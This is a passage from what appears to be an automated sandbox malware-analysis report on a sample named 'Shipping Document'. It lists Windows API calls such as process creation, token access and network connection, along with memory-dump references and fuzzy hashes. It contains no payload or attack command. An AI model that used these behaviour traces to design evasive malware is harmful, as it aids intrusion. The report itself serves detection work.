                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0104B5F5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: 6931e7cb0faca919299a236abe004a37ab2673082c46ab7a544707c1253d0c9e
                              • Instruction ID: ed483cf32da9dd4faa6edc280e54afb22fcf3f00aa183ea4f7a5ae4a88e7782c
                              • Opcode Fuzzy Hash: 6931e7cb0faca919299a236abe004a37ab2673082c46ab7a544707c1253d0c9e
                              • Instruction Fuzzy Hash: 861163B9D0020AEFDB51DFA9C584AEEFBF9FB08310F108166E954E3210D735AA518F90
                              APIs
                              • _memset.LIBCMT ref: 0104B8FE
                              • _memset.LIBCMT ref: 0104B90D
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01087F20,01087F64), ref: 0104B93C
                              • CloseHandle.KERNEL32 ref: 0104B94E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memset$CloseCreateHandleProcess
                              • String ID:
                              • API String ID: 3277943733-0
                              • Opcode ID: 89d6c6a9f415ead19b6cb2d6b41cfcdfba7bf831202ad2e048cd23c138b63cfb
                              • Instruction ID: fb0459335d5f1f24e8e031d1257a6954f7106f3176d041ae98ad0f87dd48eb07
                              • Opcode Fuzzy Hash: 89d6c6a9f415ead19b6cb2d6b41cfcdfba7bf831202ad2e048cd23c138b63cfb
                              • Instruction Fuzzy Hash: 49F082F2544310BBF2202666AC49FBF3A9CEB08758F104060BBC8D618FD77A4D0087A8
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 01026E88
                                • Part of subcall function 0102794E: _memset.LIBCMT ref: 01027983
                              • _memmove.LIBCMT ref: 01026EAB
                              • _memset.LIBCMT ref: 01026EB8
                              • LeaveCriticalSection.KERNEL32(?), ref: 01026EC8
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CriticalSection_memset$EnterLeave_memmove
                              • String ID:
                              • API String ID: 48991266-0
                              • Opcode ID: 7b6b3c89a90bc4ab35b990e09b0d22ad45ccaa0deda3cca9aae26ca04482692a
                              • Instruction ID: b7c40778f4fd2e9de135908e063e7c029bf89759cb4d2638e8aab281056aa324
                              • Opcode Fuzzy Hash: 7b6b3c89a90bc4ab35b990e09b0d22ad45ccaa0deda3cca9aae26ca04482692a
                              • Instruction Fuzzy Hash: 28F05E7A200210ABCF116F55DD84A8ABB2AEF45320B08C055FE089F21AC736A911DBB4
                              APIs
                                • Part of subcall function 00FC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
                                • Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC135C
                                • Part of subcall function 00FC12F3: BeginPath.GDI32(?), ref: 00FC1373
                                • Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC139C
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104C030
                              • LineTo.GDI32(00000000,?,?), ref: 0104C03D
                              • EndPath.GDI32(00000000), ref: 0104C04D
                              • StrokePath.GDI32(00000000), ref: 0104C05B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                              • String ID:
                              • API String ID: 1539411459-0
                              • Opcode ID: 1dc72ed73465ca6d8ae1e50339241e28fbe74030c6d551a26753d9913e35dafd
                              • Instruction ID: 5eebb8efa46d697dd1032382ebb2bd9618206b430c3e33be1a3d0998ba81c9a7
                              • Opcode Fuzzy Hash: 1dc72ed73465ca6d8ae1e50339241e28fbe74030c6d551a26753d9913e35dafd
                              • Instruction Fuzzy Hash: 11F0BE7500525ABBEB326F58ED0EFCE3F98AF06310F044100FA91210D587BA0160CFA5
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101A399
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101A3AC
                              • GetCurrentThreadId.KERNEL32 ref: 0101A3B3
                              • AttachThreadInput.USER32(00000000), ref: 0101A3BA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 387c45cc7dede41937c90e6d111b74ef644bc95ab8a4c18127ce200512de7584
                              • Instruction ID: f78bf9f569e0fdfa3cb041f493c087578452f4627ac6d1eb440e2c2825b4a91d
                              • Opcode Fuzzy Hash: 387c45cc7dede41937c90e6d111b74ef644bc95ab8a4c18127ce200512de7584
                              • Instruction Fuzzy Hash: 7CE03071241268BBEB211A65DD4CFD77F5CEF167A1F008015F989D6054C6BA8540C7A0
                              APIs
                              • GetSysColor.USER32(00000008), ref: 00FC2231
                              • SetTextColor.GDI32(?,000000FF), ref: 00FC223B
                              • SetBkMode.GDI32(?,00000001), ref: 00FC2250
                              • GetStockObject.GDI32(00000005), ref: 00FC2258
                              • GetWindowDC.USER32(?,00000000), ref: 00FFC0D3
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FFC0E0
                              • GetPixel.GDI32(00000000,?,00000000), ref: 00FFC0F9
                              • GetPixel.GDI32(00000000,00000000,?), ref: 00FFC112
                              • GetPixel.GDI32(00000000,?,?), ref: 00FFC132
                              • ReleaseDC.USER32(?,00000000), ref: 00FFC13D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                              • String ID:
                              • API String ID: 1946975507-0
                              • Opcode ID: 57c3bef8b355d5287d89fa26ea333ca56b78e01e75d55ab35126aa2c1a6a263d
                              • Instruction ID: 8aebf47b0d08c6cf6d876fc6331a285e4c115a99f2b109036f339f6ec24618c1
                              • Opcode Fuzzy Hash: 57c3bef8b355d5287d89fa26ea333ca56b78e01e75d55ab35126aa2c1a6a263d
                              • Instruction Fuzzy Hash: A0E06576500149ABEB315F68FA4D7D83B10EB06332F008356FBA9580F587764590DB51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 01018C63
                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0101882E), ref: 01018C6A
                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0101882E), ref: 01018C77
                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0101882E), ref: 01018C7E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CurrentOpenProcessThreadToken
                              • String ID:
                              • API String ID: 3974789173-0
                              • Opcode ID: e89a513c7b51361a5fc1446841431d077ca715323376bb57773a7aeabb394687
                              • Instruction ID: 093c894f67dcd02a0faa94ef46e66411d479e25370ad56531d0775d769795f2a
                              • Opcode Fuzzy Hash: e89a513c7b51361a5fc1446841431d077ca715323376bb57773a7aeabb394687
                              • Instruction Fuzzy Hash: 58E086BA642212EBD7705FBC6F4CB573BACEF41792F048858B6C5C9048D63D8041CB51
                              APIs
                              • GetDesktopWindow.USER32 ref: 01002187
                              • GetDC.USER32(00000000), ref: 01002191
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010021B1
                              • ReleaseDC.USER32(?), ref: 010021D2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 870479243c7edc7ead0b63df9bbf9d35ab516f3aba21b51e9fdcc0bd1341b689
                              • Instruction ID: e1cbb5758ecb8fe7dcb63e556d0967538e9fd365f42fb3d51486e4fc7bb8c4b4
                              • Opcode Fuzzy Hash: 870479243c7edc7ead0b63df9bbf9d35ab516f3aba21b51e9fdcc0bd1341b689
                              • Instruction Fuzzy Hash: 95E0E5B9800606EFDB11AFB5DA49B9E7BB1EB5C350F118409FD9A97250CB7D8141AF40
                              APIs
                              • GetDesktopWindow.USER32 ref: 0100219B
                              • GetDC.USER32(00000000), ref: 010021A5
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010021B1
                              • ReleaseDC.USER32(?), ref: 010021D2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: da4991181ce18a1e0af6708020f2d2a8314b1833b7bb415e6c47579684798a89
                              • Instruction ID: 05d1e39e82520574ed549af86d5e3e6ff4da8854e8bee4b383c9a6ecf19d76b1
                              • Opcode Fuzzy Hash: da4991181ce18a1e0af6708020f2d2a8314b1833b7bb415e6c47579684798a89
                              • Instruction Fuzzy Hash: A5E0E5B9800206AFCB21AFB5CA49A9E7BA1EB4C310F118009FD9A97210CB7D9141AF40
                              APIs
                              • OleSetContainedObject.OLE32(?,00000001), ref: 0101B981
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ContainedObject
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 3565006973-3941886329
                              • Opcode ID: 0ae7de0064dd49e4a4f907a3bed3d3470ad29100931fa030338dbc8febf59a31
                              • Instruction ID: 0efb4f893902c2360365288366f55c66b1dddbcb74642a4ee59cbdca43b258dc
                              • Opcode Fuzzy Hash: 0ae7de0064dd49e4a4f907a3bed3d3470ad29100931fa030338dbc8febf59a31
                              • Instruction Fuzzy Hash: F8915B716002029FDB64DF68C884A6ABBF5FF48710F1485ADF98ACB295DB75E841CB50
                              APIs
                                • Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • __wcsnicmp.LIBCMT ref: 0102B298
                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0102B361
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                              • String ID: LPT
                              • API String ID: 3222508074-1350329615
                              • Opcode ID: e15b79fd7b4c8cf4e65e90622f13f6540b35490bc5e5ecc1e449a16ce8fb880b
                              • Instruction ID: 4ab6d482dcca87941766afd58e1aca988fad6065a4ceaeeda45c771a2e5c75a7
                              • Opcode Fuzzy Hash: e15b79fd7b4c8cf4e65e90622f13f6540b35490bc5e5ecc1e449a16ce8fb880b
                              • Instruction Fuzzy Hash: E7618375A04225EFCB14DF98C985EAEB7F4EF08710F05809AF986AB351DB74AE44CB50
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00FD2AC8
                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FD2AE1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: c8fa42e3e10dba1ce9780456913fadec896166a600ef4fdcb688168f22c36739
                              • Instruction ID: aef8466030424f97bab3f4a23bc005cdd4d352d234bb11aa9d1e0d7876479262
                              • Opcode Fuzzy Hash: c8fa42e3e10dba1ce9780456913fadec896166a600ef4fdcb688168f22c36739
                              • Instruction Fuzzy Hash: 565168714187459BD320AF11DD8AFABBBE8FF84310F42884DF1D981095DB798428DB26
                              APIs
                                • Part of subcall function 00FC506B: __fread_nolock.LIBCMT ref: 00FC5089
                              • _wcscmp.LIBCMT ref: 01029AAE
                              • _wcscmp.LIBCMT ref: 01029AC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcscmp$__fread_nolock
                              • String ID: FILE
                              • API String ID: 4029003684-3121273764
                              • Opcode ID: a4e0b19dddf2a0f0fce71e5712d99bea1c2f89d8410a4ac3eb545d475a4b7c85
                              • Instruction ID: d17354d32d4b9aea3edbbe57eb9de891f2888ae2cffc9a8ba7061fbaf12e11ce
                              • Opcode Fuzzy Hash: a4e0b19dddf2a0f0fce71e5712d99bea1c2f89d8410a4ac3eb545d475a4b7c85
                              • Instruction Fuzzy Hash: 8D410671A4062ABADF219BA4CC46FEFBBFDDF45B14F000079F940E7181DA75AA4487A1
                              APIs
                              • _memset.LIBCMT ref: 01032892
                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010328C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CrackInternet_memset
                              • String ID: |
                              • API String ID: 1413715105-2343686810
                              • Opcode ID: 91371256fef38153db6bf90e527e1eadf6df0b28c7f6daee8553bbe906c2c86f
                              • Instruction ID: 9edc70752d8bdab3d3501bd9d49c3e154c9d34cd5fae6605b1ae920351c3b79b
                              • Opcode Fuzzy Hash: 91371256fef38153db6bf90e527e1eadf6df0b28c7f6daee8553bbe906c2c86f
                              • Instruction Fuzzy Hash: 4631507180121AAFCF01EFA5CC86EEEBFB9FF08350F10406AF914A6165DB355A56DB60
                              APIs
                              • DestroyWindow.USER32(?,?,?,?), ref: 01046D86
                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01046DC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$DestroyMove
                              • String ID: static
                              • API String ID: 2139405536-2160076837
                              • Opcode ID: e20cc9b6d9df66c141c016b13c909e80efdf025b367cb2954b897dd17c844a8c
                              • Instruction ID: ada0f5a9cc694d3b58f3b8ee9effe493a3969a21ebd7b8886d4111241d756754
                              • Opcode Fuzzy Hash: e20cc9b6d9df66c141c016b13c909e80efdf025b367cb2954b897dd17c844a8c
                              • Instruction Fuzzy Hash: DB318FB1500605AFEB11AF28CC80BFB77A8FF49724F108529F9E597191DA36A891DB60
                              APIs
                              • _memset.LIBCMT ref: 01022E00
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01022E3B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              • Opcode ID: 1ac208322ea0849cf0e0160307c7942951ebc3fce475d6f54119404420edbdc5
                              • Instruction ID: 3b84f1fe6832dc27c4ac97a2b9bc69427d11812dcff083570b64d6da2b083f71
                              • Opcode Fuzzy Hash: 1ac208322ea0849cf0e0160307c7942951ebc3fce475d6f54119404420edbdc5
                              • Instruction Fuzzy Hash: CD31E371600325ABEF649E8DC884BAEBFF9FF05300F1400A9EAC5971A0D7709580EB50
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 010469D0
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010469DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: b73fd399eb641f5b48fe0a15c22031a095aa03600ad9a964ba39e230d95e241b
                              • Instruction ID: 8d9e93543d0ff13aaafa4de6422c69d9c4a73a71afcaf418d5c318a728a20c55
                              • Opcode Fuzzy Hash: b73fd399eb641f5b48fe0a15c22031a095aa03600ad9a964ba39e230d95e241b
                              • Instruction Fuzzy Hash: DE11E9B56101096FEF129E18CCC0EFB37AEEB8A3A4F110135F99897291E6769C5087A0
                              APIs
                                • Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
                                • Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
                                • Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91
                              • GetWindowRect.USER32(00000000,?), ref: 01046EE0
                              • GetSysColor.USER32(00000012), ref: 01046EFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                              • String ID: static
                              • API String ID: 1983116058-2160076837
                              • Opcode ID: e05a7fe7108e9851aa2e841d106ab3edd28a72b60f7b845282191de9bfcc83d6
                              • Instruction ID: 53474c312a18da687908e3e15cb99596b38c42a1e8b17d61f4e27fb57f7ff63f
